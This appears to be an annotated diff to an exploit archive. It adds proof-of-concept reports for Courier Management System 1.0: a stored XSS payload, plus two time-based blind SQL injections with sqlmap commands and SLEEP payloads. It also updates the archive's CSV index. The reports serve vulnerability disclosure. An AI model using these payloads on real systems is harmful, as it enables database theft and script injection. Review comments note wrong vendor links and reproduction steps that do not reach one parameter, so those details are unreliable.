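Review bot: the file as committed is not valid Python: quoted-printable soft line breaks (`=` at end of line) split string literals and expressions in `usage()`, `reset_password`, `change_password`, `change_binary`, `trigger_exploit`, `get_privileges`, the four SQL payload f-strings, `get_row` and the final `change_binary(url, "bash", ...)` call, and the French messages carry `=C3=A9`-style encoded bytes instead of UTF-8; the source needs to be re-decoded before it is usable as a reference. Logic problem in `reset_password`: `if r.text.find(response):` is the wrong test, because `str.find` returns -1 (truthy) when the text is absent and 0 (falsy) only when it sits at offset zero, so the branch is taken whether or not the confirmation message appeared; `if response in r.text:`, as already used in `change_binary`, is the intended check. Smaller points: `hex`, `hash`, `min` and `max` shadow builtins; `get_antispam_code` writes files under /tmp that are never removed; `open("junk.txt", "rb")` in `trigger_exploit` is never closed; `re.findall(r"id=\d", ...)` in `get_privileges` only matches single-digit user ids; `TRESHOLD` and 'passworrd' are misspelled; `# Date: 2/12/2020` is ambiguous and disagrees with the CSV's `2020-12-11`; and no CVE or fixed-version line is given for either the time-based injection in `object_status` or the `MAIN_ANTIVIRUS_COMMAND` setting the script abuses.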


@ -0,0 +1,15 @@
# Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged in username on header and select Manage Account.
Step 3: Rename the user First Name or Last Name to
"<script>alert(1111)</script>".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Logout and login again and the page will display the domain name.
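Review bot: the `# Vendor Homepage` and `# Software Link` lines point at `task-management-system-using-phpmysqli-source-code.html` / `Task+Management+System` (nid=14615), not at the Courier Management System the title names, so the references do not identify the affected product; the same links are repeated in the two SQL injection files for this product. Step 5 ("the page will display the domain name") is unclear; say what is actually observed and which page renders the stored first or last name unescaped. No CVE, version-tested or fixed-version line is given.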


@ -0,0 +1,50 @@
# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page in burpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: MULTIPART street ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="id"
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="street"
11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="city"
111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="state"
1111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="zip_code"
11111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="country"
1111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="contact"
111111111
-----------------------------12317926718649295872939507245--
---
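Review bot: the title here, `'MULTIPART street ' SQL Injection`, does not match the CSV description for 49242, `'MULTIPART street ((custom) ' SQL Injection`, which has picked up sqlmap's parameter label complete with an unbalanced parenthesis; the plain parameter name `street` is the sensible title in both places. Step 5's doubled quotes in `""/ajax.php?action=save_branch""` and 'burpsute' are typos. The pasted sqlmap output identifies the injection but not its source location (the `save_branch` handler in `ajax.php` is named only as a URL), the report gives no remediation, and the vendor links are for the wrong product (see the 'First Name' file).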


@ -0,0 +1,23 @@
# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page inburpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: ref_no (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND
'knst'='knst
---
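Review bot: Steps 1 to 7 are copied unchanged from the 'street' file, including the `page=new_branch` / `action=save_branch` request, but `ref_no` is not one of the fields of that multipart form (it lists id, street, city, state, zip_code, country and contact), so the reproduction steps do not reach the parameter the sqlmap output reports; describe the form or endpoint that actually posts `ref_no`. 'inburpsute' should read 'in Burp Suite'. Same wrong vendor links and missing CVE, version and remediation lines as the other two Courier Management System files.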


@ -18239,8 +18239,8 @@ id,file,description,date,author,type,platform,port
47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,
47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,
47554,exploits/windows/remote/47554.py,"Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow",2019-10-29,"Lance Biggerstaff",remote,windows,
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows,
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)",2019-10-29,"Thomas Zuk",remote,windows,
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)",2019-10-29,"Thomas Zuk",remote,windows,
47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
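Review bot: this hunk is a description-only change for two existing entries (47558 and 47559 gain the `(MS15-011)` and `(MS15-014)` suffixes), not new entries, but the commit message lists both the old and the new titles as if four entries had changed; mark them as renames there. Ids, file paths, dates and author are unchanged, which is correct for a title edit.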
@ -43451,3 +43451,15 @@ id,file,description,date,author,type,platform,port
49229,exploits/jsp/webapps/49229.txt,"Openfire 4.6.0 - 'path' Stored XSS",2020-12-10,j5s,webapps,jsp,
49230,exploits/php/webapps/49230.txt,"Library Management System 2.0 - Auth Bypass SQL Injection",2020-12-10,"Manish Solanki",webapps,php,
49231,exploits/php/webapps/49231.txt,"WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting",2020-12-10,"Ilca Lucian Florin",webapps,php,
49232,exploits/java/webapps/49232.txt,"Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting",2020-12-11,gx1,webapps,java,
49233,exploits/jsp/webapps/49233.txt,"Openfire 4.6.0 - 'groupchatJID' Stored XSS",2020-12-11,j5s,webapps,jsp,
49234,exploits/jsp/webapps/49234.txt,"Openfire 4.6.0 - 'users' Stored XSS",2020-12-11,j5s,webapps,jsp,
49235,exploits/jsp/webapps/49235.txt,"Openfire 4.6.0 - 'sql' Stored XSS",2020-12-11,j5s,webapps,jsp,
49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,
49237,exploits/java/webapps/49237.txt,"Jenkins 2.235.3 - 'Description' Stored XSS",2020-12-11,gx1,webapps,java,
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE",2020-12-11,coiffeur,webapps,php,
49239,exploits/php/webapps/49239.txt,"Supply Chain Management System - Auth Bypass SQL Injection",2020-12-11,"Piyush Malviya",webapps,php,
49240,exploits/php/webapps/49240.py,"Dolibarr 12.0.3 - SQLi to RCE",2020-12-11,coiffeur,webapps,php,
49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
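Review bot: the description for 49242 ends in `((custom) '`, an unbalanced parenthesis carried over from sqlmap's parameter label, and differs from that file's own `# Exploit Title` line (`'MULTIPART street '`); use the parameter name `street` in both. The twelve added rows match the twelve new files above and the "12 changes" in the commit message. The dates in this hunk are ISO 8601 while several of the new files record `11/12/2020`, `2020/12/11`, `20201211`, `2/12/2020` or `2020-06-11`; the file headers should be brought into line with what the CSV records.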
